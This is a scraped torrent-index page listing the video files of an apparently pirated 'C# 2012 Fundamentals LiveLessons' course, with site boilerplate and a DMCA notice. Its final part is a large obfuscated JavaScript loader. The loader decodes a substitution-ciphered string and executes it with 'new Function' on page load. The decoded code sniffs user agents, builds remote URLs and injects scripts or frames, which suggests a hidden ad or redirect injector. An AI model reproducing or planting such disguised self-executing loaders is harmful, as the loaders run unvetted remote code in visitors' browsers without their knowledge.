C# 2012 Fundamentals LiveLessons Parts I, II, III, and IV

mp4   Hot:225   Size:6.49 GB   Created:2017-09-03 08:36:04   Update:2021-11-09 14:36:25  

File List

  • BYB_WIN7_01.Setting up your development environment.mp4 29.42 MB
    Code_examples.zip 30.74 MB
    Lesson01_Win7_VSdesktop_01.Test-Driving .mp4 14.42 MB
    Lesson01_Win7_VSdesktop_intro.Lesson introduction.mp4 7.17 MB
    lesson02_01.Overview of the IDE and creating a new project.mp4 21.91 MB
    lesson02_02.IDE Menus and Toolbars.mp4 17.79 MB
    lesson02_03.Navigating the IDE.mp4 18.39 MB
    lesson02_04.Using Help.mp4 25.62 MB
    lesson02_05.Using Visual App Development to Create a Simple....mp4 60.33 MB
    lesson02_intro.Lesson introduction.mp4 27.8 MB
    lesson03_01.A Simple C- App- Displaying a Line of Text.mp4 37.72 MB
    lesson03_02.Creating a Simple App in Visual Studio.mp4 16.6 MB
    lesson03_03.Displaying a Single Line of Text with Multiple Statements.mp4 17.87 MB
    lesson03_04.Displaying Multiple Lines of Text with a Single Statement.mp4 7.29 MB
    lesson03_05.Formatting Text with Console.Write and Console.WriteLine.mp4 11.39 MB
    lesson03_06.Adding Integers.mp4 30.81 MB
    lesson03_08.Decision Making- Equality and Relational Operators.mp4 21.98 MB
    lesson03_intro.Lesson introduction.mp4 31.35 MB
    lesson04_01.Declaring a Class with a Method and Instantiating an Object of That Class.mp4 46.56 MB
    lesson04_02.Declaring a Method with a Parameter.mp4 26.62 MB
    lesson04_03.Instance Variables and Properties.mp4 81.47 MB
    lesson04_04.Value Types vs. Reference Types.mp4 6.3 MB
    lesson04_05.Initializing Objects with Constructors.mp4 28.03 MB
    lesson04_06.Floating-Point Numbers, Type decimal and Validating Data.mp4 59.24 MB
    lesson04_intro.Lesson introduction.mp4 47.88 MB
    lesson05_01.Class Average Using Counter-Controlled Repetition.mp4 34.55 MB
    lesson05_02.Class Average Using Sentinel-Controlled Repetition.mp4 25.89 MB
    lesson05_03.Nested Control Statements.mp4 12.31 MB
    lesson05_04.Compound Assignment Operators.mp4 2.38 MB
    lesson05_05.Increment and Decrement Operators.mp4 10.36 MB
    lesson05_intro.Lesson introduction.mp4 16.1 MB
    lesson06_01.Essentials of Counter-Controlled Repetition.mp4 4.8 MB
    lesson06_02.for Repetition Statement.mp4 11.81 MB
    lesson06_03.Summing integers with the for statement.mp4 5.71 MB
    lesson06_04.Compound Interest Calculations with for.mp4 16.65 MB
    lesson06_05.doGǪwhile Repetition Statement.mp4 7.11 MB
    lesson06_06.switch Multiple-Selection Statement.mp4 52.48 MB
    lesson06_07.break Statement Exiting a for Statement.mp4 4.76 MB
    lesson06_08.continue Statement Terminating an Iteration of a for Statement.mp4 3.98 MB
    lesson06_09.Logical Operators.mp4 16.98 MB
    lesson06_intro.Lesson introduction.mp4 28.35 MB
    lesson07_01.static Methods- User-Defined Method maximum.mp4 23.69 MB
    lesson07_02.Three Ways to Call a Method.mp4 6.75 MB
    lesson07_03.Promotion Rules.mp4 5.54 MB
    lesson07_04.The .NET Framework Class Library.mp4 34.66 MB
    lesson07_05.Shifted and Scaled Random Numbers for Rolling a Six-Sided Die.mp4 16.91 MB
    lesson07_06.Roll a Six-Sided Die 6000000 Times.mp4 7.31 MB
    lesson07_07.Case Study- A Game of Chance; Introducing Enumerations.mp4 53.14 MB
    lesson07_08.Scope of Declarations.mp4 37.88 MB
    lesson07_09.Method Overloading.mp4 22.86 MB
    lesson07_10.Optional Parameters.mp4 7.73 MB
    lesson07_11.Named Parameters.mp4 16.93 MB
    lesson07_12.A Simple Example of Recursion- Factorial.mp4 12.14 MB
    lesson07_13.Passing Arguments By Value and By Reference.mp4 33.03 MB
    lesson07_intro.Lesson introduction.mp4 38.13 MB
    lesson08_01.Creating an Array.mp4 12.39 MB
    lesson08_02.Using an Array Initializer.mp4 6.45 MB
    lesson08_03.Calculating a Value to Store in Each Element of an Array Introducing const.mp4 9.17 MB
    lesson08_04.Summing the Elements of an Array.mp4 4.85 MB
    lesson08_05.Using Bar Charts to Display Data Graphically.mp4 10.14 MB
    lesson08_06.Using the Elements of an Array as Counters.mp4 6.21 MB
    lesson08_07.Using Arrays to Analyze Survey Results Introduction to Exception Handling.mp4 43.98 MB
    lesson08_08.Card Shuffling and Dealing Simulation.mp4 49.31 MB
    lesson08_09.foreach Repetition Statement.mp4 11.29 MB
    lesson08_10.Passing Arrays and Array Elements to Methods.mp4 18.6 MB
    lesson08_11.Passing Arrays by Value and by Reference.mp4 32.57 MB
    lesson08_12.Case Study- GradeBook Using an Array to Store Grades.mp4 41.22 MB
    lesson08_13.Multidimensional Arrays.mp4 28.74 MB
    lesson08_14.Case Study- GradeBook Using a Rectangular Array.mp4 34.49 MB
    lesson08_15.Variable-Length Argument Lists.mp4 7.66 MB
    lesson08_16.Using Command-Line Arguments.mp4 22.87 MB
    lesson08_intro.Lesson introduction.mp4 38.27 MB
    lesson09_01.Querying an Array of int Values using LINQ.mp4 0 B
    lesson09_02.Querying an Array of Employee Objects Using LINQ.mp4 67.92 MB
    lesson09_03.Introduction to Collection and the Generic List Class.mp4 32.89 MB
    lesson09_04.Querying a Generic Collection Using LINQ.mp4 28.93 MB
    lesson09_intro.Lesson introduction.mp4 21.86 MB
    lesson10_01.Time Class Case Study.mp4 50.32 MB
    lesson10_02.Controlling Access to Members.mp4 5.59 MB
    lesson10_03.Referring to the Current Object's Members with the this Reference.mp4 37.55 MB
    lesson10_04.Time Class Case Study- Overloaded Constructors.mp4 85.69 MB
    lesson10_05.Composition.mp4 35.41 MB
    lesson10_06.static Class Members.mp4 32.67 MB
    lesson10_07.A Note About Constant Fields of a Class.mp4 2.45 MB
    lesson10_08.Class View and Object Browser.mp4 30.99 MB
    lesson10_09.Object Initializers.mp4 8.47 MB
    lesson10_intro.Lesson introduction.mp4 47.74 MB
    lesson11_01.Base Classes and Derived Classes.mp4 12.45 MB
    lesson11_02.Creating a CommissionEmployee Class.mp4 48.52 MB
    lesson11_03.Creating a BasePlusCommissionEmployee Class without Using Inheritance.mp4 30.92 MB
    lesson11_04.Creating a CommissionEmployee-BasePlusCommissionEmployee Inheritance Hierarchy.mp4 52.15 MB
    lesson11_05.Inheritance Hierarchy Using protected Instance Variables.mp4 41.79 MB
    lesson11_06. Hierarchy Using private Instance Variables- wi.mp4 43.67 MB
    lesson11_07.Class object.mp4 9.79 MB
    lesson11_intro.Lesson introduction.mp4 48.99 MB
    lesson12_01.Demonstrating Polymorphic.mp4 46.34 MB
    lesson12_02.Case Study- Payroll System Using Polymorphism.mp4 12.46 MB
    lesson12_03.Creating Abstract Base Class Employee.mp4 17.34 MB
    lesson12_04.Creating Concrete Derived Class SalariedEmployee.mp4 19.34 MB
    lesson12_05.Creating Concrete Derived Class HourlyEmployee.mp4 11.95 MB
    lesson12_06.Creating Concrete Derived Class CommissionEmployee.mp4 16.29 MB
    lesson12_07.Creating Concrete Derived Class BasePlusCommissionEmployee.mp4 16.82 MB
    lesson12_08.Polymorphic Processing Operator is and Downcasting.mp4 82.78 MB
    lesson12_09.Sealed Methods and Classes.mp4 3.56 MB
    lesson12_10.Developing an IPayable Hierarchy.mp4 6.85 MB
    lesson12_11.Declaring Interface IPayable.mp4 5.43 MB
    lesson12_12.Creating Class Invoice.mp4 18.73 MB
    lesson12_13.Modifying Class Employee to Implement Interface IPayable.mp4 8.21 MB
    lesson12_14.Modifying Class SalariedEmployee for use with IPayable.mp4 7.93 MB
    lesson12_15.Using Interface IPayable to Process.mp4 37.66 MB
    lesson12_16.Operator Overloading.mp4 39.11 MB
    lesson12_intro.Lesson introduction.mp4 78.13 MB
    lesson13_01.Example- Divide by Zero without Exception Handling.mp4 29.43 MB
    lesson13_02.Example- Handling DivideByZeroExceptions and FormatExceptions.mp4 31.82 MB
    lesson13_03.finally Block.mp4 59.42 MB
    lesson13_04.The using Statement.mp4 6.82 MB
    lesson13_05.Exception Properties.mp4 40.35 MB
    lesson13_06.Programmer-Defined Exception Classes.mp4 20.33 MB
    lesson13_intro.Lesson introduction.mp4 29.36 MB
    lesson14_01.Introduction to GUIs.mp4 9.08 MB
    lesson14_02.A Simple Event-Driven GUI.mp4 78.41 MB
    lesson14_03.Building the Simple Event Example and.mp4 50.58 MB
    lesson14_04.Delegates and the Event Handling Mechanism.mp4 19.88 MB
    lesson14_05.Locating Event Information.mp4 28.09 MB
    lesson14_06.Control Properties and Layout.mp4 19.84 MB
    lesson14_07.Labels, TextBoxes and Buttons.mp4 26.22 MB
    lesson14_08.GroupBoxes and Panels.mp4 15.1 MB
    lesson14_09.CheckBoxes.mp4 17.74 MB
    lesson14_10.RadioButtons.mp4 48.28 MB
    lesson14_11.PictureBoxes.mp4 21.86 MB
    lesson14_12.ToolTips.mp4 8.15 MB
    lesson14_13.NumericIUpDown Control.mp4 18.84 MB
    lesson14_14.Mouse-Event Handling.mp4 29.33 MB
    lesson14_15.Keyboard-Event Handling.mp4 19.98 MB
    lesson14_intro.Lesson introduction.mp4 37.79 MB
    lesson15_01.Menus.mp4 57.64 MB
    lesson15_02.MonthCalendar Control.mp4 10.61 MB
    lesson15_03.DateTimePicker Control.mp4 37.19 MB
    lesson15_04.LinkLabel Control.mp4 15.96 MB
    lesson15_05.ListBox Control.mp4 21.05 MB
    lesson15_06.CheckedListBox Control.mp4 17.07 MB
    lesson15_07.ComboBox Control.mp4 29.85 MB
    lesson15_08.TreeView Control.mp4 52.7 MB
    lesson15_09.ListView Control.mp4 76.89 MB
    lesson15_10.TabControl Control.mp4 23.56 MB
    lesson15_11.Multiple Document Interface (MDI) Windows.mp4 49.63 MB
    lesson15_12.Visual Inheritance.mp4 40.15 MB
    lesson15_13.User-Defined Controls.mp4 34.13 MB
    lesson15_intro.Lesson introduction.mp4 25.55 MB
    lesson16_01.string Constructors.mp4 12.45 MB
    lesson16_02.string Indexer, Length property and CopyTo Method.mp4 13.14 MB
    lesson16_03.Comparing strings.mp4 26.67 MB
    lesson16_04.Determining Whether a String Begins.mp4 7.84 MB
    lesson16_05.Locating Characters and Substrings in strings.mp4 40.87 MB
    lesson16_06.Extracting Substrings from strings.mp4 5.21 MB
    lesson16_07.Concatenating strings.mp4 10.25 MB
    lesson16_08.Miscellaneous string Methods.mp4 10.25 MB
    lesson16_09.Class StringBuilder Constructors.mp4 8.69 MB
    lesson16_10.Length and Capacity Properties.mp4 8.85 MB
    lesson16_11.Append Method of Class StringBuilder.mp4 0 B
    lesson16_12.AppendFormat Method of Class StringBuilder.mp4 14.7 MB
    lesson16_13.Insert and Remove Methods of Class StringBuilder.mp4 9.32 MB
    lesson16_14.Replace Method of Class StringBuilder.mp4 5.97 MB
    lesson16_15.Char Methods.mp4 12.75 MB
    lesson16_16.Simple Regular Expressions and Class Regex.mp4 22.45 MB
    lesson16_17.Regular-Expression Character Classes and Quantifiers.mp4 38.68 MB
    lesson16_18.A More Complex Regular Expression.mp4 7.21 MB
    lesson16_19.Validating User Input with Regular Expressions and LINQ.mp4 42.04 MB
    lesson16_20.Regex Methods Replace and Split.mp4 35.69 MB
    lesson16_intro.Lesson introduction.mp4 16.21 MB
    lesson17_01.Using Classes File and Directory.mp4 48.71 MB
    lesson17_02.Using LINQ to Search Directories and Determine File Types.mp4 33.62 MB
    lesson17_03.BankLibrary- Reusable Class BankUIForm.mp4 10.98 MB
    lesson17_04.BankLibrary- Reusable Class Record.mp4 5.93 MB
    lesson17_05.Creating and Writing to a Sequential-Access File.mp4 43.85 MB
    lesson17_06.Reading Date from a Sequential-Access Text File.mp4 27.68 MB
    lesson17_07.Case Study- Credit-Inquiry Program.mp4 28.11 MB
    lesson17_08.BankLibrary- Class RecordSerializable.mp4 11.3 MB
    lesson17_09.Creating a Sequential-Access File Using Object Serialization.mp4 22.42 MB
    lesson17_10.Reading and Deserializing Data from a Binary File.mp4 18.72 MB
    lesson17_intro.Lesson introduction.mp4 19.23 MB
    lesson18_01.Motivation for Generic Methods.mp4 16.53 MB
    lesson18_02.Generic-Method Implementation.mp4 15.63 MB
    lesson18_03.Type Constraints.mp4 48.76 MB
    lesson18_04.Generic Classes.mp4 52.04 MB
    lesson18_05.Generic Methods That Receive Objects of Generic Classes as Arguments.mp4 22.43 MB
    lesson18_intro.Lesson introduction.mp4 20.58 MB
    lesson19_01.Class Array and Enumerators.mp4 0 B
    lesson19_02.Class ArrayList.mp4 32.61 MB
    lesson19_03.Class Stack.mp4 18.4 MB
    lesson19_04.Class ClassHashtable.mp4 22.26 MB
    lesson19_05.Generic Class SortedDictionary.mp4 18.37 MB
    lesson19_06.Generic Class LinkedList.mp4 55.38 MB
    lesson19_intro.Lesson introduction.mp4 31.08 MB
    lesson20_01.Relational Databases.mp4 7.42 MB
    lesson20_02.Books Database.mp4 13.65 MB
    lesson20_03.Books Database- Entity-Relationship Diagram.mp4 5.26 MB
    lesson20_04.LINQ to Entities and the ADO.NET Entity Framework.mp4 5.73 MB
    lesson20_05.Demonstrating the Display Authors Table App.mp4 12.36 MB
    lesson20_06.Creating the ADO NET Entity Data Model Class Library.mp4 21.81 MB
    lesson20_07.Creating a Windows Forms Project.mp4 20.22 MB
    lesson20_08.Data Bindings Between Controls and the Entity Data Model.mp4 16.8 MB
    lesson20_09.Code for the Data Bindings Between Controls.mp4 51.98 MB
    lesson20_10.Dynamically Binding Query Results.mp4 4.92 MB
    lesson20_11.Creating the Display Query Results GUI.mp4 19.31 MB
    lesson20_12.Coding the App.mp4 33.32 MB
    lesson20_13.Retrieving Data from Multiple Tables with LINQ.mp4 71.53 MB
    lesson20_14.Creating a Master-Detail View App.mp4 52.62 MB
    lesson20_15.Address Book Case Study.mp4 8.33 MB
    lesson20_16.Address Book Case Study- Creating the GUI.mp4 41.31 MB
    lesson20_17.Address Book Case Study- Coding the app.mp4 34.41 MB
    lesson20_intro.Lesson introduction.mp4 33.66 MB
    Lesson21_01.Web Basics.mp4 11.47 MB
    Lesson21_02.Multitier App Architecture.mp4 11.63 MB
    Lesson21_03.Testing Your First Web App.mp4 35.69 MB
    Lesson21_04.Building Your First Web App.mp4 214.42 MB
    lesson21_05.Standard Web Controls.mp4 112.23 MB
    lesson21_06.Validation Controls- Demo.mp4 19.75 MB
    lesson21_07.Validation Controls.mp4 108.77 MB
    lesson21_08.Session Tracking.mp4 175.91 MB
    lesson21_09.Data Driven ASP.NET Guestbook- Demo.mp4 25.73 MB
    lesson21_10.Data Driven ASP.NET Guestbook.mp4 115.99 MB
    Lesson21_intro.Lesson introduction.mp4 31.72 MB
    lesson26_01.Basics of async and await.mp4 4.87 MB
    lesson26_02.Introduction to the Fibonacci calculation used in Sections.mp4 3 MB
    lesson26_03.Executing an Asynchronous Task from a GUI App.mp4 56.03 MB
    lesson26_04.Sequential Execution of Two Compute Intensive Tasks.mp4 22.63 MB
    lesson26_05.Asynchronous Execution of Two Compute Intensive Tasksp.mp4 63.7 MB
    lesson26_06.Invoking a Flickr Web Service Asynchronously with WebClient.mp4 124.67 MB
    lesson26_intro.Lesson introduction.mp4 36.63 MB

Download Info

  • Tips

    “C# 2012 Fundamentals LiveLessons Parts I, II, III, and IV” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="h9m3gbx3qf";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm0Y51J({mRT4gQ@{n/CL/@@{jR8hQ^sp)Rs:7"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"hQ^sp)Rs:7"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYms5n6d1qmRT4"="@@{5p(LYpmQLqd0@fmRT4"="@@{D7(LSqms5n6d1qmRT4"="@@{dC(LJ^mQLqd0@fmRT4"="@@{(C(L:4ms5n6d1qmRT4"="@@{C2(LSYmQLqd0@fmRT4"="@@{25(LLSms5n6d1qmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm@dRJDdomRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm@dRJDdomRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm0Y51J({mRT4gQ@{n/f/@@{j(8}vR8hQ^sp)Rs:7"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm0Y51J({mRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();